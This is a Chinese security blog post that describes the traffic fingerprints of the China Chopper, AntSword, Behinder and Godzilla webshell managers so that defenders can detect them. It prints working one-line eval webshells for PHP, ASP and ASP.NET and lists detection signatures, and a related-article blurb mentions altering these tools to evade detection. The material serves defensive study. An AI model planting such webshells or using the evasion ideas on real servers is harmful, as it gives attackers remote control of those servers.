Webshell工具的流量特征分析(菜刀,蚁剑,冰蝎,哥斯拉)

已于 2022-06-05 16:07:21 修改
阅读量3.3w 收藏 468
点赞数 57
分类专栏: 渗透测试 文章标签: java 开发语言
于 2022-05-31 20:00:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/125048353
版权
本文详细分析了常见的Webshell管理工具,如中国菜刀、蚂蚁宝剑、冰蝎和哥斯拉的流量特征和payload模式。针对PHP、ASP、ASP.NET和JSP平台,列举了payload的典型字符串和数据包特征。通过请求头、请求体和响应内容的特定模式,帮助安全人员识别和防御此类风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 前言

使用各种的shell工具获取到目标权限,即可进行数据操作,今天来简要分析一下目前常使用的各类shell管理工具的流量特诊,帮助蓝队同学在风险识别上快速初值

0x01 中国菜刀流量分析

payload特征:
PHP: <?php @eval($_POST['caidao']);?>

ASP: <%eval request(“caidao”)%>

ASP.NET: <%@ Page
Language=“Jscript”%><%eval(Request.Item[“caidao”],“unsafe”);%>

数据包流量特征:
1,请求包中:ua头为百度,火狐
2,请求体中存在eavl,base64等特征字符
3,请求体中传递的payload为base64编码,并且存在固定的QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

0x02 蚂蚁宝剑流量分析

payload特征:
Php中使用assert,eval执行,
asp 使用eval
在jsp使用的是Java类加载(ClassLoader),同时会带有base64编码解码等字符特征

数据包流量特征:
使用普通的一句话都存在以下特征:
每个请求体都存在@ini_set(“display_errors”, “0”);@set_time_limit(0)开头。并且后面存在base64等字符
响应包的结果返回格式为:
随机数
响应内容
随机数

使用base64加密的payload,数据包存在以下base加密的eval命令执行,数据包的payload内容存在几个分段内容,分别都使用base加密,解密后可以看到相关的路径,命令等
响应包的结果返回格式为:
随机数
编码后的结果
随机数

0x03 冰蝎流量分析

paylaod分析:
php在代码中同样会存在eval或assert等字符特征

在aps中会在for循环进行一段异或处理

在jsp中则利用java的反射,所以会存在ClassLoader,getClass().getClassLoader()等字符特征

冰蝎2.0流量特征:
第一阶段请求中返回包状态码为200,返回内容必定是16位的密钥
请求包存在:Accept: text/html, image/gif, image/jpeg, ; q=.2, /; q=.2

建立连接后的cookie存在特征字符
所有请求 Cookie的格式都为: Cookie: PHPSESSID=; path=/;

冰蝎3.0流量特征:
请求包中content-length 为5740或5720(可能会根据Java版本而改变)
每一个请求头中存在
Pragma: no-cache,Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/*;q=0.8,application/signed-exchange;v=b3;q=0.9

0x04 哥斯拉流量特征

payload特征:
jsp会出现xc,pass字符和Java反射(ClassLoader,getClass().getClassLoader()),base64加解码等特征
php,asp则为普通的一句话木马

哥斯拉流量分析:
作为参考:
所有请求中Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
所有响应中Cache-Control: no-store, no-cache, must-revalidate,
同时在所有请求中Cookie中后面都存在;特征

参考:https://www.freebuf.com/articles/web/324622.html

WAF攻防——菜刀 冰蝎 哥斯拉webshell工具及特征分析
m0_61506558的博客
01-13 1024
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,常见的webshell编写语言为asp、jsp和php。比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。
常见的webshell工具流量特征
m0_66458291的博客
01-19 3876
常见的webshell工具流量的简单分析菜刀冰蝎哥斯拉
最新冰蝎哥斯拉菜刀流量特征分析与检测指南
最新发布
ai0070411的博客
03-17 1119
近年来,冰蝎(Behinder)、哥斯拉(Godzilla)、(AntSword)、菜刀(ChinaChopper)等工具仍是攻防对抗中的高频武器。本文基于最新样本(截至2024年8月),深度剖析其流量特征,并提供实战检测方法。:攻防对抗持续升级,建议结合流量特征与主机日志进行联动分析。:检测规则库与样本下载。
0x145 Webshell篇&魔改冰蝎&打乱特征指纹&新增加密协议&过后门查杀&过流量识别
m0_74048540的博客
02-25 929
本文探讨了恶意工具冰蝎哥斯拉流量特征的魔改过程。首先,通过抓包分析流量特征,修改请求头和请求体以打乱原特征,增加加密算法以规避检测。冰蝎的魔改涉及反编译数据包,分析流量特征及添加新加解密协议。相似地,哥斯拉的魔改过程同样包括反编译和修改代码,以绕过hash校验并抓取流量特征。最终,针对生成的shell进行加密处理以增强隐蔽性,探讨了更为复杂的混淆技巧,为网络安全领域的技术研究提供了借鉴。
常见webshell工具流量特征
weixin_75158417的博客
03-03 990
使用AES加密+base64编码,AES使用动态密钥对通信进行加密,进行请求时内置了十几个U-A头,每次请求时会随机选择其中一个。因此当发现一个IP的请求头中的u-a头在不断的发生变化,就有可能是冰蝎。因此当发现一个ip的请求头中的u-a在频繁变换,就可能是冰蝎。3.0连接jsp的webshell的请求数据包中的content-type字段常见为application/octet-stream。使用AES加密+base64编码,取消了2.0的动态获取密钥,使用固定的连接密钥,随机数 结果 随机数。
webshell客户端流量特征
buffedon的博客
07-14 5080
webshell客户端流量特征概述:1. 冰蝎2. 中国菜刀2011,2014版本2016版本3. Cknife4. 5. 哥斯拉 webshell客户端 用于webshell后门和攻击者之间的通信程序,我们可以通过webshell客户端的流量来判断服务器上是否存在Webshell后门。 概述: 中国菜刀流量特征比较明显,2011,2014版本中,流量中有的php代码,asp代码是明文形式,jsp代码有固定格式,容易被检测出来。2016版本隐蔽性增强,对php,asp代码增加了混淆,还对ASP代码进行
WEBSHELL管理工具流量特征——基础篇
ALLEN'Blog
01-17 1861
今天给大家带来了WEBSHELL管理工具流量特征基础篇,简单介绍了菜刀这两个比较简单的流量特征,之后也会给大家带来别的WEBSHELL管理工具流量分析,如果夏欢本文希望可以一键三连支持一下。
常见的webshell流量特征和检测思路
weixin_45585955的博客
04-11 7971
所以分析如上:该流量是WebShell链接流量的第一段链接流量,其中特征主要在i=A&z0=GB2312,菜刀链接JSP木马时,第一个参数定义操作,其中参数值为A-Q,如i=A,第二个参数指定编码,其参数值为编码,如z0=GB2312,有时候z0后面还会接着又z1=、z2=参数用来加入攻击载荷。最后传给cmd的这些流量字符中有自己的特征,1、都是系统命令;2、必须以分号结尾;至此,冰蝎成为了一个完美的开箱即用的工具,本体内存马免杀,流量免杀,功能齐全,兼容性好,在连续几年的攻防演练中,成为最热门的工具
webshell流量特征
ka_ka11的博客
03-28 1185
webshell
Webshell管理工具流量特征
m0_70655343的博客
07-15 475
3.0分析流量发现相比2.0少了动态密钥的获取的请求,不再使用随机生成key,改为取连接密码的md5加密值的前16位作为密钥。采用了和冰蝎3.0一样的密钥交换方式,哥斯拉建立连接时会发起三次请求,第一次请求数据超级长,建立session,第二三次请求确认连接。第一次请求服务端产生密钥写入session,session和当前会话绑定,不同的客户端的密钥也是不同的。默认的shell,连接时会请求两次,其请求体只是经过url编码,其流量中也存在和一样的代码。...
四大webshell流量特征冰蝎菜刀哥斯拉
2301_76690905的博客
03-20 1053
一样的密钥交换方式,哥斯拉建立连接时会发起三次请求,第一次请求数据超级长,建立。和当前会话绑定,不同的客户端的密钥也是不同的。少了动态密钥的获取的请求,不再使用随机生成。一次请求为判断是否可以建立连接,少了俩次。编码,其流量中也存在和一样的代码。,连接时会请求两次,其请求体只是经过。获取冰蝎动态密钥的行为,第二次发送。第二次请求,会把主机目录列出来。等代码执行,获取网站的信息。,接下来去获取主机的信息。第一次请求,关闭报错和。,第二三次请求确认连接。特征就是传输参数名为。第二次请求是为了获取。
菜刀冰蝎三款Webshell工具对比分析
qq_48368964的博客
08-14 1834
密文的加密方式为先将传递数据base64加密,再将其进行AES加密,由于新版本中取消了动态密钥交互过程,加密的密钥被写死在shell中,如果是不改密码直接使用默认的shell,检测是可以进行解密检测敏感字符的,比如:error_reporting(0) ,phpinfo()等。https://github.com/AntSwordProject/AwesomeScript官方为我们提供了制作好的后门,官方的脚本均做了不同程度“变异”,的核心代码是由菜刀修改而来的,所有普通的一句话木马也可以使用。
菜刀冰蝎哥斯拉流量特征
热门推荐
eternitymd的博客
04-29 2万+
菜刀流量特征(最开始是明文传输,后来采用base64加密):PHP类WebShell链接流量 如下图: 第一:“eval”,eval函数用于执行传递的攻击payload,这是必不可少的; 第二:(base64_decode($_POST[z0]))(base64_decode($_POST[z0]))将攻击payload进行Base64解码,因为菜刀默认是使用Base64编码,以避免被检测; 第三:&z0=QGluaV9zZXQ...,该部分是传递攻击payload,此参数z0对应$_
菜刀 冰蝎 哥斯拉流量特征
weixin_42750884的博客
10-13 435
冰蝎2.0相比,冰蝎3.0取消了动态密钥获取的请求,AES的密钥直接固定为连接密码32位md5的前16位,默认连接密码是"rebeyond"(即密钥是md5(‘rebeyond’)[0:16]=e45e329feb5d925b)。两次请求中,第一次请求用于判断是否可以建立连接。与冰蝎2.0相似,进行请求时内置了十几个User-Agent头,每次请求时会随机选择其中的一个。连接jsp的webshell的请求数据包中的content-type字段常见为application/octet-stream。
哥斯拉冰蝎流量特征
congsec的博客
07-14 1806
网络安全攻防中,不同的攻击工具各有其独特的流量特征。本文将深入浅出地介绍哥斯拉冰蝎流量特征,并详细分析菜刀流量特征,帮助基础小白更好地理解这些工具在网络流量中的表现。
玄机:第六章 流量特征分析-流量分析
cjchsh的博客
02-21 742
玄机:第六章 流量特征分析-流量分析
流量特征分析——菜刀冰蝎哥斯拉
Sgirll的博客
07-22 1万+
通过对这三种常见的网络攻击工具流量特征分析,我们可以更好地了解它们在网络流量中的表现。同时,持续的学习和了解新兴攻击工具流量特征也是保持网络安全的重要一环。哥斯拉的数据包中包含了特定的标记,如"XORHEAD"和"XORBODY",用于标识该数据包是哥斯拉的控制命令。此外,哥斯拉还使用了一种自定义的二进制协议,在通信中传输各种类型的数据。本文将重点研究菜刀冰蝎这三种常见的网络攻击工具分析它们在流量中留下的痕迹和特征,以便网络管理员和安全专家能够更好地识别和对抗这些工具所带来的潜在威胁。
webshell工具-冰蝎流量特征和加密方式
qq_40898302的博客
05-25 2049
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。而老牌的如中国菜刀因为其流量特征太过明显,从而使用的场景越来越少。
webshell管理工具流量特征
08-25
webshell管理工具流量特征包括以下几个方面: 1. 使用各种shell工具获取目标权限,进行数据操作。其中,菜刀是一种常用的shell管理工具,可以对webshell进行流量分析。 2. webshell管理工具的流量中,可以通过解密来获取攻击者上传到服务器的webshell样本。同时,可以使用wireshark等流量包分析工具来获取流量信息。 3. 在不同的编程语言中,webshell管理工具的payload特征也有所不同。例如,在Php中可能使用assert、eval执行;在asp中可能使用eval;在jsp中可能使用Java类加载(ClassLoader),并伴有base64编码解码等字符特征。 综上所述,webshell管理工具流量特征包括菜刀流量分析、解密webshell样本、使用各种shell工具获取目标权限以及不同编程语言中的payload特征。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [kingkong:解密哥斯拉webshell管理工具流量](https://download.csdn.net/download/weixin_42134143/16688569)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [Webshell工具流量特征分析](https://blog.csdn.net/Chales123/article/details/131135315)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值